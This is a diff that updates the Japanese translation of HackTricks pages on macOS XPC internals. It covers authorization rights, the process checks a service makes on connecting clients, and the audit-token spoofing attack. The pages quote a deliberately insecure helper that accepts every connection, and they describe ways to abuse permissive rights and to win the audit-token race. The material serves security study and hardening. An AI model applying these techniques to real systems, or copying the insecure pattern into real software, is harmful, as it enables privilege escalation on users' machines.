-**`xpc_pipe`**オブジェクトは、使用される2つのMachポートと名前(ある場合)の情報をその構造体に持つ**`xpc_object_t`**です。たとえば、plist `/System/Library/LaunchDaemons/com.apple.secinitd.plist`内のデーモン`secinitd`の名前は、`com.apple.secinitd`と呼ばれるパイプを構成します。
+**`xpc_pipe`** オブジェクトは、使用される 2 つの Mach ポートと名前(ある場合)の情報を含む **`xpc_object_t`** です。たとえば、plist `/System/Library/LaunchDaemons/com.apple.secinitd.plist` にあるデーモン `secinitd` の名前は、`com.apple.secinitd` というパイプを構成します。
 
-**`xpc_pipe`**の例は、**`launchd`**によって作成された**bootstrap pipe**で、Machポートの共有を可能にします。
+**`xpc_pipe`** の例は、**`launchd`** によって作成された **bootstrap pipe** で、Mach ポートの共有を可能にします。
 
 - **`NSXPC*`**
 
-これらは、XPC接続の抽象化を可能にするObjective-Cの高レベルオブジェクトです。\
-さらに、これらのオブジェクトは、前のものよりもDTraceでデバッグしやすくなっています。
+これらは、XPC 接続の抽象化を可能にする Objective-C の高レベルオブジェクトです。\
+さらに、これらのオブジェクトは、前のものよりも DTrace でデバッグしやすくなっています。
 
 - **`GCD Queues`**
 
-XPCはメッセージを渡すためにGCDを使用し、さらに`xpc.transactionq`、`xpc.io`、`xpc-events.add-listenerq`、`xpc.service-instance`などの特定のディスパッチキューを生成します。
+XPC はメッセージを渡すために GCD を使用し、さらに `xpc.transactionq`、`xpc.io`、`xpc-events.add-listenerq`、`xpc.service-instance` などの特定のディスパッチキューを生成します。
 
-## XPCサービス
+## XPC サービス
 
-これらは、他のプロジェクトの**`XPCServices`**フォルダー内にある`.xpc`拡張子を持つ**バンドル**であり、`Info.plist`では`CFBundlePackageType`が**`XPC!`**に設定されています。\
-このファイルには、Application、User、System、またはサンドボックスを定義できる`_SandboxProfile`、またはサービスに連絡するために必要な権限やIDを示す可能性のある`_AllowedClients`など、他の構成キーがあります。これらおよび他の構成オプションは、サービスが起動されるときにサービスを構成するのに役立ちます。
+これらは、他のプロジェクトの **`XPCServices`** フォルダー内にある `.xpc` 拡張子を持つバンドルであり、`Info.plist` では `CFBundlePackageType` が **`XPC!`** に設定されています。\
+このファイルには、Application、User、System または `_SandboxProfile` のような他の構成キーがあり、サンドボックスを定義したり、`_AllowedClients` がサービスに連絡するために必要な権限や ID を示すことがあります。これらの構成オプションは、サービスを起動する際に役立ちます。
 
 ### サービスの開始
 
-アプリは、`xpc_connection_create_mach_service`を使用してXPCサービスに**接続**しようとし、その後launchdがデーモンを見つけて**`xpcproxy`**を起動します。**`xpcproxy`**は構成された制限を強制し、提供されたFDとMachポートでサービスを生成します。
+アプリは `xpc_connection_create_mach_service` を使用して XPC サービスに **接続** しようとし、その後 launchd がデーモンを見つけて **`xpcproxy`** を起動します。**`xpcproxy`** は構成された制限を強制し、提供された FD と Mach ポートでサービスを生成します。
 
-XPCサービスの検索速度を向上させるために、キャッシュが使用されます。
+XPC サービスの検索速度を向上させるために、キャッシュが使用されます。
 
-`xpcproxy`のアクションをトレースすることができます:
+`xpcproxy` のアクションをトレースすることができます:
 ```bash
 supraudit S -C -o /tmp/output /dev/auditpipe
 ```
-XPCライブラリは、`xpc_ktrace_pid0`および`xpc_ktrace_pid1`を呼び出すアクションをログするために`kdebug`を使用します。使用されるコードは文書化されていないため、`/usr/share/misc/trace.codes`に追加する必要があります。これらのコードは`0x29`のプレフィックスを持ち、例えば`0x29000004`: `XPC_serializer_pack`があります。\
-ユーティリティ`xpcproxy`は`0x22`のプレフィックスを使用し、例えば`0x2200001c: xpcproxy:will_do_preexec`があります。
+XPCライブラリは、`xpc_ktrace_pid0`および`xpc_ktrace_pid1`を呼び出すアクションをログするために`kdebug`を使用します。使用されるコードは文書化されていないため、これらを`/usr/share/misc/trace.codes`に追加する必要があります。これらのコードはプレフィックス`0x29`を持ち、例えば`0x29000004`: `XPC_serializer_pack`のようになります。\
+ユーティリティ`xpcproxy`はプレフィックス`0x22`を使用し、例えば`0x2200001c: xpcproxy:will_do_preexec`のようになります。
 
 ## XPCイベントメッセージ
 
-アプリケーションは異なるイベント**メッセージ**に**サブスクライブ**でき、これによりそのようなイベントが発生したときに**オンデマンドで開始**できるようになります。これらのサービスの**セットアップ**は、**前述のディレクトリと同じディレクトリ**にある**launchd plistファイル**で行われ、追加の**`LaunchEvent`**キーが含まれています。
+アプリケーションは異なるイベント**メッセージ**に**サブスクライブ**でき、これによりそのようなイベントが発生したときに**オンデマンドで開始**されることが可能です。これらのサービスの**セットアップ**は、**前述のディレクトリと同じディレクトリにある**`launchd plistファイル`で行われ、追加の**`LaunchEvent`**キーを含んでいます。
 
 ### XPC接続プロセスチェック
 
-プロセスがXPC接続を介してメソッドを呼び出そうとすると、**XPCサービスはそのプロセスが接続を許可されているかどうかを確認する必要があります**。以下は、一般的な確認方法と一般的な落とし穴です:
+プロセスがXPC接続を介してメソッドを呼び出そうとする場合、**XPCサービスはそのプロセスが接続を許可されているかどうかを確認する必要があります**。以下はその確認方法と一般的な落とし穴です:
 
 {{#ref}}
 macos-xpc-connecting-process-check/
@@ -128,7 +128,7 @@ macos-xpc-connecting-process-check/
 
 ## XPC認可
 
-Appleは、アプリが**いくつかの権利を構成し、それを取得する方法を設定する**ことを許可しているため、呼び出しプロセスがそれらを持っている場合、**XPCサービスからメソッドを呼び出すことが許可されます**:
+Appleはまた、アプリが**いくつかの権利を設定し、それを取得する方法を構成する**ことを許可しているため、呼び出しプロセスがそれらを持っている場合、**XPCサービスからメソッドを呼び出すことが許可されます**:
 
 {{#ref}}
 macos-xpc-authorization.md
@@ -149,7 +149,7 @@ xpcspy -U  -t 'i:com.apple.*' -t 'o:com.apple.*' -r
 ```
 別の使用可能なツールは [**XPoCe2**](https://newosxbook.com/tools/XPoCe2.html) です。
 
-## XPC 通信 C コード例
+## XPC 通信 C コードの例
 
 {{#tabs}}
 {{#tab name="xpc_server.c"}}
@@ -281,7 +281,7 @@ sudo launchctl load /Library/LaunchDaemons/xyz.hacktricks.service.plist
 sudo launchctl unload /Library/LaunchDaemons/xyz.hacktricks.service.plist
 sudo rm /Library/LaunchDaemons/xyz.hacktricks.service.plist /tmp/xpc_server
 ```
-## XPCコミュニケーション Objective-C コード例
+## XPC通信のObjective-Cコード例
 
 {{#tabs}}
 {{#tab name="oc_xpc_server.m"}}
@@ -439,14 +439,14 @@ return;
 ```
 ## Remote XPC
 
-この機能は `RemoteXPC.framework`(`libxpc`から)によって提供され、異なるホスト間でXPCを介して通信することができます。\
-リモートXPCをサポートするサービスは、plistにUsesRemoteXPCキーを持っており、これは`/System/Library/LaunchDaemons/com.apple.SubmitDiagInfo.plist`のケースのようです。しかし、サービスは`launchd`で登録されますが、機能を提供するのは`UserEventAgent`で、プラグイン`com.apple.remoted.plugin`と`com.apple.remoteservicediscovery.events.plugin`です。
+この機能は `RemoteXPC.framework`(`libxpc`から)によって提供され、異なるホスト間でXPCを介して通信することを可能にします。\
+リモートXPCをサポートするサービスは、`/System/Library/LaunchDaemons/com.apple.SubmitDiagInfo.plist`のように、plistにUsesRemoteXPCキーを持っています。しかし、サービスは`launchd`に登録されますが、機能を提供するのは`UserEventAgent`で、プラグイン`com.apple.remoted.plugin`と`com.apple.remoteservicediscovery.events.plugin`です。
 
-さらに、`RemoteServiceDiscovery.framework`は、`com.apple.remoted.plugin`から情報を取得することを可能にし、`get_device`、`get_unique_device`、`connect`などの関数を公開しています。
+さらに、`RemoteServiceDiscovery.framework`は、`com.apple.remoted.plugin`から情報を取得することを可能にし、`get_device`、`get_unique_device`、`connect`などの関数を公開します。
 
-一度`connect`が使用され、サービスのソケット`fd`が収集されると、`remote_xpc_connection_*`クラスを使用することが可能です。
+一度`connect`が使用され、サービスのソケット`fd`が取得されると、`remote_xpc_connection_*`クラスを使用することが可能です。
 
-リモートサービスに関する情報は、次のようなパラメータを使用してCLIツール`/usr/libexec/remotectl`を使用することで取得できます:
+リモートサービスに関する情報は、次のようなパラメータを使用してCLIツール`/usr/libexec/remotectl`を使用することで取得できます:
 ```bash
 /usr/libexec/remotectl list # Get bridge devices
 /usr/libexec/remotectl show ...# Get device properties and services
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
index 948bd95f2..41bae5e42 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
@@ -4,13 +4,13 @@
 
 ## XPC Authorization
 
-Appleは、接続プロセスが**公開されたXPCメソッドを呼び出す権限を持っているかどうかを認証する**別の方法を提案しています。
+Appleは、接続プロセスが**公開されたXPCメソッドを呼び出す権限を持っているかどうかを認証する別の方法**を提案しています。
 
 アプリケーションが**特権ユーザーとしてアクションを実行する必要がある**場合、通常は特権ユーザーとしてアプリを実行するのではなく、アプリから呼び出してそのアクションを実行できるXPCサービスとしてHelperToolをルートとしてインストールします。ただし、サービスを呼び出すアプリは十分な認可を持っている必要があります。
 
 ### ShouldAcceptNewConnectionは常にYES
 
-例として、[EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample)を見つけることができます。`App/AppDelegate.m`では、**HelperTool**に**接続**しようとします。そして、`HelperTool/HelperTool.m`では、関数**`shouldAcceptNewConnection`**は、前述の要件を**チェックしません**。常にYESを返します:
+例として、[EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample)を見つけることができます。`App/AppDelegate.m`では、**HelperTool**に**接続**しようとします。そして、`HelperTool/HelperTool.m`では、関数**`shouldAcceptNewConnection`**は、前述の要件のいずれも**チェックしません**。常にYESを返します:
 ```objectivec
 - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection
 // Called by our XPC listener when a new connection comes in.  We configure the connection
@@ -27,7 +27,7 @@ newConnection.exportedObject = self;
 return YES;
 }
 ```
-詳細な設定方法については、次のチェックを参照してください:
+詳細な設定方法については、こちらをご覧ください:
 
 {{#ref}}
 macos-xpc-connecting-process-check/
@@ -62,7 +62,7 @@ if (self->_authRef) {
 [self.window makeKeyAndOrderFront:self];
 }
 ```
-`Common/Common.m`の`setupAuthorizationRights`関数は、アプリケーションの権限を`/var/db/auth.db`の認証データベースに保存します。データベースにまだ存在しない権限のみを追加することに注意してください:
+`Common/Common.m`の`setupAuthorizationRights`関数は、アプリケーションの権限を`/var/db/auth.db`の認証データベースに保存します。データベースにまだ存在しない権限のみが追加されることに注意してください。
 ```objectivec
 + (void)setupAuthorizationRights:(AuthorizationRef)authRef
 // See comment in header.
@@ -94,7 +94,7 @@ assert(blockErr == errAuthorizationSuccess);
 }];
 }
 ```
-`enumerateRightsUsingBlock` 関数は、`commandInfo` に定義されたアプリケーションの権限を取得するために使用されます。
+関数 `enumerateRightsUsingBlock` は、`commandInfo` に定義されたアプリケーションの権限を取得するために使用されます。
 ```objectivec
 static NSString * kCommandKeyAuthRightName    = @"authRightName";
 static NSString * kCommandKeyAuthRightDefault = @"authRightDefault";
@@ -172,15 +172,15 @@ block(authRightName, authRightDefault, authRightDesc);
 }];
 }
 ```
-このプロセスの最後に、`commandInfo`内で宣言された権限は`/var/db/auth.db`に保存されます。ここでは、**各メソッド**が**認証を必要とする**こと、**権限名**、および**`kCommandKeyAuthRightDefault`**が見つかります。後者は**誰がこの権利を取得できるか**を示します。
+このプロセスの最後には、`commandInfo`内で宣言された権限が`/var/db/auth.db`に保存されることを意味します。ここでは、**各メソッド**が**認証を必要とする**こと、**権限名**、および**`kCommandKeyAuthRightDefault`**が見つかります。後者は**誰がこの権利を取得できるか**を示します。
 
-権利にアクセスできる人を示すための異なるスコープがあります。それらのいくつかは[AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity_authorization/lib/AuthorizationDB.h)で定義されています([ここにすべてあります](https://www.dssw.co.uk/reference/authorization-rights/)が、要約すると:
+権利にアクセスできる人を示すための異なるスコープがあります。それらのいくつかは[AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity_authorization/lib/AuthorizationDB.h)で定義されています([ここで全てを見つけることができます](https://www.dssw.co.uk/reference/authorization-rights/))。要約すると:
 
 
名前説明
kAuthorizationRuleClassAllowallow誰でも
kAuthorizationRuleClassDenydeny誰も
kAuthorizationRuleIsAdminis-admin現在のユーザーは管理者である必要があります(管理者グループ内)
kAuthorizationRuleAuthenticateAsSessionUserauthenticate-session-ownerユーザーに認証を求めます。
kAuthorizationRuleAuthenticateAsAdminauthenticate-adminユーザーに認証を求めます。彼は管理者である必要があります(管理者グループ内)
kAuthorizationRightRuleruleルールを指定します
kAuthorizationCommentcomment権利に関する追加のコメントを指定します

 
 ### 権利の検証
 
-`HelperTool/HelperTool.m`の関数**`readLicenseKeyAuthorization`**は、呼び出し元が**そのメソッドを実行する**権限があるかどうかを確認するために、関数**`checkAuthorization`**を呼び出します。この関数は、呼び出しプロセスによって送信された**authData**が**正しい形式**であるかどうかを確認し、その後、特定のメソッドを呼び出すために**必要なもの**を確認します。すべてがうまくいけば、**返された`error`は`nil`になります**:
+`HelperTool/HelperTool.m`の関数**`readLicenseKeyAuthorization`**は、呼び出し元が**そのメソッドを実行する**権限があるかどうかを確認するために、関数**`checkAuthorization`**を呼び出します。この関数は、呼び出しプロセスから送信された**authData**が**正しい形式**であるかどうかを確認し、その後、特定のメソッドを呼び出すために**必要なもの**を確認します。すべてがうまくいけば、**返された`error`は`nil`になります**:
 ```objectivec
 - (NSError *)checkAuthorization:(NSData *)authData command:(SEL)command
 {
@@ -228,13 +228,13 @@ assert(junk == errAuthorizationSuccess);
 return error;
 }
 ```
-注意すべきは、**そのメソッドを呼び出す権利を確認するために**、関数 `authorizationRightForCommand` は以前のコメントオブジェクト **`commandInfo`** をチェックするだけです。次に、**`AuthorizationCopyRights`** を呼び出して、関数を呼び出す**権利があるかどうか**を確認します(フラグはユーザーとの対話を許可することに注意してください)。
+注意してください、**そのメソッドを呼び出す権利を得るための要件を確認するには**、関数 `authorizationRightForCommand` は以前のコメントオブジェクト **`commandInfo`** をチェックします。次に、**`AuthorizationCopyRights`** を呼び出して **その関数を呼び出す権利があるかどうか** を確認します(フラグはユーザーとの対話を許可することに注意してください)。
 
 この場合、関数 `readLicenseKeyAuthorization` を呼び出すために、`kCommandKeyAuthRightDefault` は `@kAuthorizationRuleClassAllow` に定義されています。したがって、**誰でも呼び出すことができます**。
 
 ### DB 情報
 
-この情報は `/var/db/auth.db` に保存されていると述べられました。保存されているすべてのルールをリストするには、次のコマンドを使用します:
+この情報は `/var/db/auth.db` に保存されていると述べられています。保存されたすべてのルールをリストするには、次のようにします:
 ```sql
 sudo sqlite3 /var/db/auth.db
 SELECT name FROM rules;
@@ -244,21 +244,21 @@ SELECT name FROM rules WHERE name LIKE '%safari%';
 ```bash
 security authorizationdb read com.apple.safaridriver.allow
 ```
-### 許可権限
+### Permissive rights
 
-**すべての権限設定** [**こちら**](https://www.dssw.co.uk/reference/authorization-rights/) で見つけることができますが、ユーザーの操作を必要としない組み合わせは次のとおりです。
+**すべての権限設定** [**はここにあります**](https://www.dssw.co.uk/reference/authorization-rights/)、ただし、ユーザーの操作を必要としない組み合わせは次のとおりです。
 
 1. **'authenticate-user': 'false'**
 - これは最も直接的なキーです。`false`に設定されている場合、ユーザーがこの権利を得るために認証を提供する必要がないことを指定します。
-- これは、以下の2つのいずれかと組み合わせて使用するか、ユーザーが属する必要があるグループを示すために使用されます。
+- これは、以下の2つのいずれかと組み合わせて使用されるか、ユーザーが属する必要があるグループを示します。
 2. **'allow-root': 'true'**
 - ユーザーがルートユーザー(昇格された権限を持つ)として操作している場合、このキーが`true`に設定されていると、ルートユーザーは追加の認証なしにこの権利を得る可能性があります。ただし、通常、ルートユーザーの状態に到達するにはすでに認証が必要であるため、これはほとんどのユーザーにとって「認証なし」のシナリオではありません。
 3. **'session-owner': 'true'**
 - `true`に設定されている場合、セッションの所有者(現在ログインしているユーザー)は自動的にこの権利を得ます。ユーザーがすでにログインしている場合、追加の認証をバイパスする可能性があります。
 4. **'shared': 'true'**
-- このキーは、認証なしに権利を付与するものではありません。代わりに、`true`に設定されている場合、権利が認証された後は、各プロセスが再認証を必要とせずに複数のプロセス間で共有できることを意味します。しかし、権利の最初の付与は、`'authenticate-user': 'false'`のような他のキーと組み合わせない限り、認証を必要とします。
+- このキーは、認証なしに権利を付与しません。代わりに、`true`に設定されている場合、権利が認証された後は、各プロセスが再認証を必要とせずに複数のプロセス間で共有できることを意味します。ただし、権利の最初の付与は、`'authenticate-user': 'false'`のような他のキーと組み合わせない限り、認証を必要とします。
 
-興味深い権利を取得するために、[**このスクリプト**](https://gist.github.com/carlospolop/96ecb9e385a4667b9e40b24e878652f9)を使用できます。
+[**このスクリプトを使用**](https://gist.github.com/carlospolop/96ecb9e385a4667b9e40b24e878652f9)して、興味深い権利を取得できます:
 ```bash
 Rights with 'authenticate-user': 'false':
 is-admin (admin), is-admin-nonshared (admin), is-appstore (_appstore), is-developer (_developer), is-lpadmin (_lpadmin), is-root (run as root), is-session-owner (session owner), is-webdeveloper (_webdeveloper), system-identity-write-self (session owner), system-install-iap-software (run as root), system-install-software-iap (run as root)
@@ -289,7 +289,7 @@ authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-se
 
 

 
-この場合、EvenBetterAuthorizationSampleと同じものがあり、[**この行を確認してください**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L94)。
+この場合、EvenBetterAuthorizationSampleと同じであり、[**この行を確認してください**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L94) 。
 
 使用されているプロトコルの名前が分かれば、**そのヘッダー定義をダンプする**ことが可能です:
 ```bash
@@ -324,9 +324,9 @@ cat /Library/LaunchDaemons/com.example.HelperTool.plist
 
 [...]
 ```
-### エクスプロイトの例
+### Exploit Example
 
-この例では次のものが作成されます:
+この例では、次のものが作成されます:
 
 - 関数を持つプロトコルの定義
 - アクセスを要求するために使用する空の認証
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
index e8d0c8d45..8fe9be3f6 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
@@ -4,33 +4,33 @@
 
 ## XPC 接続プロセスチェック
 
-XPCサービスへの接続が確立されると、サーバーは接続が許可されているかどうかを確認します。通常、以下のチェックが行われます:
+XPC サービスへの接続が確立されると、サーバーは接続が許可されているかどうかを確認します。通常、以下のチェックが行われます:
 
-1. 接続している**プロセスがApple署名の**証明書で署名されているか確認します(Appleからのみ発行されます)。
-- これが**確認されない場合**、攻撃者は**偽の証明書**を作成して他のチェックに一致させることができます。
-2. 接続しているプロセスが**組織の証明書**で署名されているか確認します(チームIDの確認)。
-- これが**確認されない場合**、Appleの**任意の開発者証明書**が署名に使用され、サービスに接続できます。
-3. 接続しているプロセスが**適切なバンドルID**を含んでいるか確認します。
-- これが**確認されない場合**、同じ組織によって**署名された任意のツール**がXPCサービスと対話するために使用される可能性があります。
-4. (4または5) 接続しているプロセスが**適切なソフトウェアバージョン番号**を持っているか確認します。
-- これが**確認されない場合**、古い、脆弱なクライアントがプロセスインジェクションに対して脆弱であり、他のチェックが行われていてもXPCサービスに接続される可能性があります。
-5. (4または5) 接続しているプロセスが危険な権限のない**ハードンされたランタイム**を持っているか確認します(任意のライブラリを読み込むことを許可するものやDYLD環境変数を使用するものなど)。
-1. これが**確認されない場合**、クライアントは**コードインジェクションに対して脆弱**である可能性があります。
-6. 接続しているプロセスがサービスに接続することを許可する**権限**を持っているか確認します。これはAppleのバイナリに適用されます。
-7. **検証**は接続している**クライアントの監査トークン**に**基づく**べきであり、そのプロセスID(**PID**)ではなく、前者は**PID再利用攻撃**を防ぎます。
-- 開発者は**監査トークン**API呼び出しを**ほとんど使用しない**ため、これは**プライベート**であり、Appleはいつでも**変更**できる可能性があります。さらに、プライベートAPIの使用はMac App Storeアプリでは許可されていません。
-- メソッド**`processIdentifier`**が使用される場合、脆弱である可能性があります。
-- **`xpc_dictionary_get_audit_token`**は**`xpc_connection_get_audit_token`**の代わりに使用されるべきであり、後者は特定の状況で[脆弱である可能性があります](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)。
+1. 接続している **プロセスが Apple に署名された** 証明書で署名されているか確認します(Apple のみが発行)。
+- この **確認が行われない場合、** 攻撃者は **偽の証明書** を作成して他のチェックに合致させることができます。
+2. 接続しているプロセスが **組織の証明書** で署名されているか確認します(チーム ID の確認)。
+- この **確認が行われない場合、** Apple の **任意の開発者証明書** を使用して署名し、サービスに接続できます。
+3. 接続しているプロセスが **適切なバンドル ID** を含んでいるか確認します。
+- この **確認が行われない場合、** 同じ組織に署名された任意のツールが XPC サービスと対話するために使用される可能性があります。
+4. (4 または 5) 接続しているプロセスが **適切なソフトウェアバージョン番号** を持っているか確認します。
+- この **確認が行われない場合、** 古い、脆弱なクライアントがプロセスインジェクションに対して脆弱であり、他のチェックが行われていても XPC サービスに接続される可能性があります。
+5. (4 または 5) 接続しているプロセスが危険な権限のない **ハードニングされたランタイム** を持っているか確認します(任意のライブラリを読み込むことを許可するものや DYLD 環境変数を使用するものなど)。
+1. この **確認が行われない場合、** クライアントは **コードインジェクションに対して脆弱** である可能性があります。
+6. 接続しているプロセスがサービスに接続することを許可する **権限** を持っているか確認します。これは Apple のバイナリに適用されます。
+7. **検証** は接続している **クライアントの監査トークン** に **基づく** 必要があり、プロセス ID (**PID**) ではなく、前者は **PID 再利用攻撃** を防ぎます。
+- 開発者は **監査トークン** API 呼び出しを **ほとんど使用しない** ため、これは **プライベート** であり、Apple はいつでも **変更** できる可能性があります。さらに、プライベート API の使用は Mac App Store アプリでは許可されていません。
+- メソッド **`processIdentifier`** が使用される場合、脆弱である可能性があります。
+- **`xpc_dictionary_get_audit_token`** を **`xpc_connection_get_audit_token`** の代わりに使用するべきであり、後者は特定の状況で [脆弱である可能性があります](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)。
 
 ### コミュニケーション攻撃
 
-PID再利用攻撃に関する詳細は以下を確認してください:
+PID 再利用攻撃の詳細については、以下を確認してください:
 
 {{#ref}}
 macos-pid-reuse.md
 {{#endref}}
 
-**`xpc_connection_get_audit_token`**攻撃に関する詳細は以下を確認してください:
+**`xpc_connection_get_audit_token`** 攻撃の詳細については、以下を確認してください:
 
 {{#ref}}
 macos-xpc_connection_get_audit_token-attack.md
@@ -38,18 +38,18 @@ macos-xpc_connection_get_audit_token-attack.md
 
 ### Trustcache - ダウングレード攻撃防止
 
-TrustcacheはApple Siliconマシンに導入された防御方法で、AppleのバイナリのCDHSAHのデータベースを保存し、許可された非修正バイナリのみが実行されるようにします。これにより、ダウングレードバージョンの実行が防止されます。
+Trustcache は、Apple Silicon マシンで導入された防御的手法で、Apple バイナリの CDHSAH のデータベースを保存し、許可された非修正バイナリのみが実行されるようにします。これにより、ダウングレードバージョンの実行が防止されます。
 
 ### コード例
 
-サーバーはこの**検証**を**`shouldAcceptNewConnection`**という関数で実装します。
+サーバーはこの **検証** を **`shouldAcceptNewConnection`** という関数で実装します。
 ```objectivec
 - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection {
 //Check connection
 return YES;
 }
 ```
-オブジェクト NSXPCConnection には **private** プロパティ **`auditToken`** (使用すべきだが変更される可能性があるもの)と **public** プロパティ **`processIdentifier`** (使用すべきでないもの)があります。
+オブジェクト NSXPCConnection には **private** プロパティ **`auditToken`** (使用すべきものですが変更される可能性があります)と **public** プロパティ **`processIdentifier`** (使用すべきでないもの)が存在します。
 
 接続プロセスは次のようなもので確認できます:
 ```objectivec
@@ -71,7 +71,7 @@ SecCodeCheckValidity(code, kSecCSDefaultFlags, requirementRef);
 SecTaskRef taskRef = SecTaskCreateWithAuditToken(NULL, ((ExtendedNSXPCConnection*)newConnection).auditToken);
 SecTaskValidateForRequirement(taskRef, (__bridge CFStringRef)(requirementString))
 ```
-クライアントのバージョンを確認したくない開発者は、少なくともクライアントがプロセスインジェクションに対して脆弱でないことを確認することができます:
+もし開発者がクライアントのバージョンを確認したくない場合、少なくともクライアントがプロセスインジェクションに対して脆弱でないことを確認することができます:
 ```objectivec
 [...]
 CFDictionaryRef csInfo = NULL;
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
index 2cb1b011b..c3a5b47c2 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
@@ -12,12 +12,12 @@ Mach メッセージが何か知らない場合は、このページを確認し
 ../../
 {{#endref}}
 
-現時点では、([こちらの定義](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing))を覚えておいてください:\
-Mach メッセージは _mach ポート_ を介して送信され、これは mach カーネルに組み込まれた **単一受信者、複数送信者通信** チャンネルです。**複数のプロセスがメッセージを送信できます**が、いつでも **単一のプロセスのみがそれを読み取ることができます**。ファイルディスクリプタやソケットと同様に、mach ポートはカーネルによって割り当てられ、管理され、プロセスは整数を見て、それを使用してカーネルにどの mach ポートを使用したいかを示します。
+現時点では、([こちらからの定義](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):\
+Mach メッセージは _mach ポート_ を介して送信され、これは mach カーネルに組み込まれた **単一受信者、複数送信者通信** チャネルです。**複数のプロセスがメッセージを送信できます** が、任意の時点で **単一のプロセスのみがそれを読み取ることができます**。ファイルディスクリプタやソケットと同様に、mach ポートはカーネルによって割り当てられ、管理され、プロセスは整数を見て、それを使用してカーネルにどの mach ポートを使用したいかを示します。
 
 ## XPC 接続
 
-XPC 接続がどのように確立されるか知らない場合は、確認してください:
+XPC 接続がどのように確立されるか知らない場合は、次を確認してください:
 
 {{#ref}}
 ../
@@ -25,48 +25,48 @@ XPC 接続がどのように確立されるか知らない場合は、確認し
 
 ## 脆弱性の概要
 
-知っておくべき興味深い点は、**XPC の抽象化は一対一の接続ですが、**複数の送信者を持つ技術の上に構築されているため、以下のようになります:
+知っておくべき興味深い点は、**XPC の抽象化は一対一の接続である**が、**複数の送信者を持つ技術の上に構築されている**ということです。したがって:
 
 - Mach ポートは単一受信者、**複数送信者**です。
 - XPC 接続の監査トークンは、**最近受信したメッセージからコピーされた監査トークン**です。
 - XPC 接続の **監査トークン** を取得することは、多くの **セキュリティチェック** にとって重要です。
 
-前述の状況は有望に聞こえますが、これが問題を引き起こさないシナリオもいくつかあります([こちらから](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):
+前述の状況は有望に聞こえますが、これが問題を引き起こさないシナリオもいくつかあります ([こちらから](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing)):
 
 - 監査トークンは、接続を受け入れるかどうかを決定するための認証チェックにしばしば使用されます。これはサービスポートへのメッセージを使用して行われるため、**接続はまだ確立されていません**。このポートへの追加のメッセージは、単に追加の接続要求として処理されます。したがって、接続を受け入れる前の **チェックは脆弱ではありません**(これは `-listener:shouldAcceptNewConnection:` 内で監査トークンが安全であることも意味します)。したがって、私たちは **特定のアクションを検証する XPC 接続を探しています**。
-- XPC イベントハンドラは同期的に処理されます。これは、1 つのメッセージのイベントハンドラが完了する前に次のメッセージのために呼び出される必要があることを意味します。したがって、**XPC イベントハンドラ内では監査トークンは他の通常の(非応答!)メッセージによって上書きされることはありません**。
+- XPC イベントハンドラは同期的に処理されます。これは、1 つのメッセージのイベントハンドラが次のメッセージのために呼び出される前に完了する必要があることを意味します。したがって、**XPC イベントハンドラ内では、監査トークンは他の通常の(非応答!)メッセージによって上書きされることはありません**。
 
 この脆弱性を悪用できる 2 つの異なる方法があります:
 
 1. バリアント 1:
-- **攻撃**はサービス **A** とサービス **B** に **接続**します。
+- **攻撃** はサービス **A** とサービス **B** に **接続** します。
 - サービス **B** は、ユーザーができないサービス A の **特権機能** を呼び出すことができます。
-- サービス **A** は、**`dispatch_async`** の **イベントハンドラ内ではなく**、**`xpc_connection_get_audit_token`** を呼び出します。
-- したがって、**異なる** メッセージが **監査トークンを上書き** する可能性があります。なぜなら、それはイベントハンドラの外で非同期にディスパッチされているからです。
